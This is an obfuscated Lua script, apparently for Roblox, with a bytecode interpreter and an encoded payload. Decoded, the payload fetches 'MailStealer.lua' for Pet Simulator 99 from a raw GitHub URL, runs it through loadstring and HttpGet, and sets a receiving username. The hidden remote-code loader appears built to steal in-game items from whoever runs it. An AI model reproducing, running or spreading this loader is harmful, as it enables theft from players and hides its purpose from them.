--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v82,v19);v19=nil;v92=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v83-(v83%((234 + 698) -(857 + 74))) ;else local v84=(1 + 1)^(v32-(569 -((1244 -(282 + 595)) + 201))) ;return (((v31%(v84 + v84))>=v84) and 1) or (927 -(214 + 713)) ;end end local function v21() local v34=1637 -(1523 + (496 -382)) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + ((1183 -(32 + 85)) -(68 + 997)) ;v34=1271 -(226 + 1044) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;return (v37 * (251 + 5)) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * 16777216) + (v41 * (48199 + 17337)) + (v40 * (469 -213)) + v39 ;end if (v38==(350 -((345 -258) + 263))) then v39,v40,v41,v42=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + (955 -(802 + 150)) + 1 ;v38=2 -1 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (2==v43) then v48=v20(v45,37 -16 ,31);v49=((v20(v45,24 + 8 )==((818 + 180) -(915 + 82))) and  -(2 -(773 -(201 + 571)))) or (1 + 0) ;v43=3 -0 ;end if (v43==(1190 -(1069 + 118))) then if (v48==0) then if (v47==(0 -0)) then return v49 * (0 -0) ;else local v111=0;while true do if (v111==(0 + (1138 -(116 + 1022)))) then v48=(4 -3) -0 ;v46=0 + 0 ;break;end end end elseif (v48==2047) then return ((v47==(791 -(368 + 423))) and (v49 * (1/((0 + 0) -(0 -0))))) or (v49 * NaN) ;end return v8(v49,v48-(1041 -((35 -25) + 8)) ) * (v46 + (v47/((7 -5)^(494 -(416 + 26))))) ;end if (v43==((859 -(814 + 45)) -0)) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==1) then v46=1;v47=(v20(v45,1 -0 ,458 -(145 + (721 -428)) ) * ((432 -(44 + 386))^(1518 -(998 + 488)))) + v44 ;v43=1 + 1 ;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v66=886 -(261 + 624) , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v53~=(1 + 0)) then else local v87=0;local v88;while true do if (v87~=0) then else v88=0;while true do if (v88~=(935 -(39 + 896))) then else v57={v54,v55,nil,v56};v58=v23();v88=1;end if (v88~=(1 + 0)) then else v59={};v53=2 + 0 ;break;end end break;end end end if (v53~=(396 -(115 + 281))) then else v54={};v55={};v56={};v53=2 -1 ;end if (v53~=(3 + 0)) then else local v89=0;local v90;while true do if (0~=v89) then else v90=0 -0 ;while true do if ((0 -0)~=v90) then else for v112=1,v23() do v55[v112-(868 -(550 + 317)) ]=v28();end return v57;end end break;end end end if (v53==2) then for v94=1,v58 do local v95=0 -0 ;local v96;local v97;local v98;local v99;while true do if (2==v95) then while true do if (v96~=0) then else local v114=0;while true do if (v114~=(0 -0)) then else v97=0 -0 ;v98=nil;v114=1;end if (v114~=(286 -(134 + 151))) then else v96=1;break;end end end if (v96~=(1666 -(970 + 695))) then else v99=nil;while true do if ((0 -0)~=v97) then else local v123=0;while true do if (v123~=1) then else v97=1;break;end if (v123~=(1990 -(582 + 1408))) then else v98=v21();v99=nil;v123=1;end end end if (v97~=1) then else if (v98==(3 -2)) then v99=v21()~=(0 -0) ;elseif (v98==2) then v99=v24();elseif (v98==(11 -8)) then v99=v25();end v59[v94]=v99;break;end end break;end end break;end if (1~=v95) then else v98=nil;v99=nil;v95=1826 -(1195 + 629) ;end if (v95~=(0 -0)) then else v96=241 -(187 + 54) ;v97=nil;v95=781 -(162 + 618) ;end end end v57[3 + 0 ]=v21();for v100=1 + 0 ,v23() do local v101=0 -0 ;local v102;local v103;local v104;while true do if (v101~=(0 -0)) then else v102=0 + 0 ;v103=nil;v101=1;end if (v101==1) then v104=nil;while true do if (v102~=(1637 -(1373 + 263))) then else while true do if (v103==0) then v104=v21();if (v20(v104,1001 -(451 + 549) ,1 + 0 )==0) then local v168=0 -0 ;local v169;local v170;local v171;local v172;while true do if (v168==1) then local v179=0;while true do if (v179==(0 -0)) then v171=nil;v172=nil;v179=1;end if (v179==1) then v168=2;break;end end end if (v168~=(1384 -(746 + 638))) then else v169=0 + 0 ;v170=nil;v168=1;end if (v168==(2 -0)) then while true do if (v169~=(343 -(218 + 123))) then else local v182=1581 -(1535 + 46) ;local v183;local v184;while true do if (v182==0) then v183=0;v184=nil;v182=1;end if ((1 + 0)==v182) then while true do if (v183~=(0 + 0)) then else v184=0;while true do if ((561 -(306 + 254))==v184) then v169=3;break;end if (v184~=(0 + 0)) then else local v197=0;while true do if (v197~=0) then else if (v20(v171,1,1)~=1) then else v172[2]=v59[v172[3 -1 ]];end if (v20(v171,1469 -(899 + 568) ,2 + 0 )~=(2 -1)) then else v172[3]=v59[v172[606 -(268 + 335) ]];end v197=291 -(60 + 230) ;end if (v197~=(573 -(426 + 146))) then else v184=1 + 0 ;break;end end end end break;end end break;end end end if ((1457 -(282 + 1174))~=v169) then else local v185=0;while true do if (v185==(811 -(569 + 242))) then v172={v22(),v22(),nil,nil};if (v170==0) then local v191=1024 -(706 + 318) ;local v192;local v193;while true do if (v191~=1) then else while true do if (v192==(1251 -(721 + 530))) then v193=1271 -(945 + 326) ;while true do if (0==v193) then v172[7 -4 ]=v22();v172[4]=v22();break;end end break;end end break;end if (v191==(0 + 0)) then v192=700 -(271 + 429) ;v193=nil;v191=1;end end elseif (v170==1) then v172[3]=v23();elseif (v170==(2 + 0)) then v172[1503 -(1408 + 92) ]=v23() -(2^(1102 -(461 + 625))) ;elseif (v170==(1291 -(993 + 295))) then local v199=0 + 0 ;local v200;while true do if (0~=v199) then else v200=0;while true do if (v200==(1171 -(418 + 753))) then v172[2 + 1 ]=v23() -((1 + 1)^(5 + 11)) ;v172[4]=v22();break;end end break;end end end v185=1;end if (v185~=(1 + 0)) then else v169=2;break;end end end if (0~=v169) then else local v186=0;local v187;while true do if (v186~=0) then else v187=529 -(406 + 123) ;while true do if (v187==(1770 -(1749 + 20))) then v169=1 + 0 ;break;end if (v187~=(1322 -(1249 + 73))) then else local v194=0;local v195;while true do if (v194==(0 + 0)) then v195=0;while true do if ((1145 -(466 + 679))==v195) then v170=v20(v104,2,3);v171=v20(v104,4,14 -8 );v195=1;end if (v195==(2 -1)) then v187=1901 -(106 + 1794) ;break;end end break;end end end end break;end end end if (v169==3) then if (v20(v171,3,3)==1) then v172[2 + 2 ]=v59[v172[2 + 2 ]];end v54[v100]=v172;break;end end break;end end end break;end end break;end if (v102~=(0 -0)) then else local v115=0 -0 ;while true do if (0~=v115) then else v103=114 -(4 + 110) ;v104=nil;v115=585 -(57 + 527) ;end if (v115~=1) then else v102=1;break;end end end end break;end end end v53=3;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v86=0;while true do if (v86==0) then v80=v68[v72];v81=v80[1];v86=1;end if (v86==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then local v116=0;while true do if (v116==4) then v72=v80[3];break;end if (v116==2) then v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v116=3;end if (v116==3) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v116=4;end if (v116==0) then v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v116=1;end if (v116==1) then v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v116=2;end end elseif (v81==1) then v78[v80[2]]();else local v125=0;local v126;while true do if (v125==0) then v126=v80[2];v78[v126]=v78[v126](v13(v78,v126 + 1 ,v73));break;end end end elseif (v81<=3) then local v117=v80[2];local v118=v78[v80[3]];v78[v117 + 1 ]=v118;v78[v117]=v118[v80[4]];elseif (v81>4) then local v127=0;local v128;local v129;local v130;local v131;while true do if (v127==1) then v73=(v130 + v128) -1 ;v131=0;v127=2;end if (v127==2) then for v177=v128,v73 do local v178=0;while true do if (v178==0) then v131=v131 + 1 ;v78[v177]=v129[v131];break;end end end break;end if (v127==0) then v128=v80[2];v129,v130=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v127=1;end end else local v132;local v133,v134;local v135;local v136;v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v136=v80[2];v135=v78[v80[3]];v78[v136 + 1 ]=v135;v78[v136]=v135[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v136=v80[2];v133,v134=v71(v78[v136](v13(v78,v136 + 1 ,v80[3])));v73=(v134 + v136) -1 ;v132=0;for v165=v136,v73 do v132=v132 + 1 ;v78[v165]=v133[v132];end v72=v72 + 1 ;v80=v68[v72];v136=v80[2];v78[v136]=v78[v136](v13(v78,v136 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];end elseif (v81<=8) then if (v81<=6) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==7) then v62[v80[3]]=v78[v80[2]];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=10) then if (v81>9) then do return;end else v78[v80[2]]=v62[v80[3]];end elseif (v81==11) then v78[v80[2]]=v80[3];else v72=v80[3];end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!093O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B692O75502F50532O395F4D61696C737465616C65722F6D61696E2F4D61696C537465616C65722E6C756103083O00557365726E616D6503073O005478715F707854030A3O004C6F61645363722O656E00143O00120B3O00013O0026083O000B0001000200040C3O000B0001001209000100033O001204000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001300010026083O00010001000100040C3O0001000100120B000100083O00122O000100076O000100013O00122O000100093O00124O00023O00044O000100012O000A3O00017O00",v9(),...);